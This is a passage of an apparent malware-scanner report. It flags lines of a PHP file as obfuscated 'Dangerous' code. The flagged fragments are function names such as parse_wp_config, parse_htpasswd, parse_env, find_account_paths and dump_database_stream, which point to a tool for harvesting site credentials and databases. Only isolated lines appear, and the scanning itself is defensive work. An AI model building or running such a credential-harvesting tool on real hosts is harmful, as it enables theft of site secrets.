#007700">(</span><span style="color: #DD0000">'click'</span><span style="color: #007700">,function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){ if(</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">target</span><span style="color: #007700">===</span><span style="color: #0000BB">this</span><span style="color: #007700">) </span><span style="color: #0000BB">closeModal</span><span style="color: #007700">(); });</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1001</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dump_database_stream</span><span style="color: #007700">(</span><span style="color: #0000BB">$in</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1005</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'deflate_init'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1060</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function (</span><span style="color: #0000BB">$line</span><span style="color: #007700">) use (</span><span style="color: #0000BB">$out</span><span style="color: #007700">, </span><span style="color: #0000BB">$zip</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'up_to_wp_mode'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_mode</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 120</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_run_app</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1213</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dir_is_readable</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1215</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return @</span><span style="color: #0000BB">scandir</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) !== </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1218</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">find_public_html_in_path</span><span style="color: #007700">(</span><span style="color: #0000BB">$start</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1219</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">null</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1226</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$path</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1231</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">find_account_paths</span><span style="color: #007700">(</span><span style="color: #0000BB">$current_dir</span><span style="color: #007700">, </span><span style="color: #0000BB">$root_dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1242</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$paths</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1245</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">path_is_deep_subfolder</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1246</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (bool) </span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'#/(wp-content|themes|plugins|mu-plugins|dist|vendor|node_modules|cache|uploads)(/|$)#i'</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1249</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">collect_scan_dir_candidates</span><span style="color: #007700">(</span><span style="color: #0000BB">$current_dir</span><span style="color: #007700">, </span><span style="color: #0000BB">$root_dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">defined</span><span style="color: #007700">(</span><span style="color: #DD0000">'UP_TO_WP_MODE'</span><span style="color: #007700">) && </span><span style="color: #0000BB">UP_TO_WP_MODE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1306</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">array_values</span><span style="color: #007700">(</span><span style="color: #0000BB">$unique</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1309</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">score_scan_candidate</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1332</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$score</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">resolve_scan_roots</span><span style="color: #007700">(</span><span style="color: #0000BB">$current_dir</span><span style="color: #007700">, </span><span style="color: #0000BB">$root_dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1339</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #0000BB">$path</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$b</span><span style="color: #007700">[</span><span style="color: #DD0000">'score'</span><span style="color: #007700">] - </span><span style="color: #0000BB">$a</span><span style="color: #007700">[</span><span style="color: #DD0000">'score'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1350</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$a</span><span style="color: #007700">[</span><span style="color: #DD0000">'path'</span><span style="color: #007700">]) - </span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$b</span><span style="color: #007700">[</span><span style="color: #DD0000">'path'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1384</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">array_slice</span><span style="color: #007700">(</span><span style="color: #0000BB">$readable</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">10</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1392</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_env</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1402</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$vars</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1404</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_wp_config</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1414</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_joomla_config</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1422</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_htaccess</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1434</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1436</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_htpasswd</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1444</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$users</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1446</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">find_nginx_config</span><span style="color: #007700">(</span><span style="color: #0000BB">$site_name</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1449</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$p</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1457</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$fp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1462</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_nginx_config</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">detect_cms</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1493</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$cms</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1494</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'WordPress (no config)'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1495</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'Joomla (no config)'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1496</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'Unknown (has .env)'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1497</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'Static / Unknown'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1498</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'Empty / Not a site'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 149</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_pwd_salt</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 14</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_action_param</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1500</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">build_site_entry</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$full</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 150</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'u2_scan_v1'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1513</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">'name'</span><span style="color: #007700">=></span><span style="color: #0000BB">$name</span><span style="color: #007700">,</span><span style="color: #DD0000">'path'</span><span style="color: #007700">=></span><span style="color: #0000BB">$full</span><span style="color: #007700">,</span><span style="color: #DD0000">'cms'</span><span style="color: #007700">=></span><span style="color: #0000BB">$cms</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1522</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dir_looks_like_site</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1527</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">detect_cms</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) !== </span><span style="color: #DD0000">'Empty / Not a site'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 152</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_password_expected_hash</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1530</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">scan_sites</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1532</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">'error'</span><span style="color: #007700">=></span><span style="color: #DD0000">'Cannot read: '</span><span style="color: #007700">.</span><span style="color: #0000BB">$dir</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1544</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$a</span><span style="color: #007700">,</span><span style="color: #0000BB">$b</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1547</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
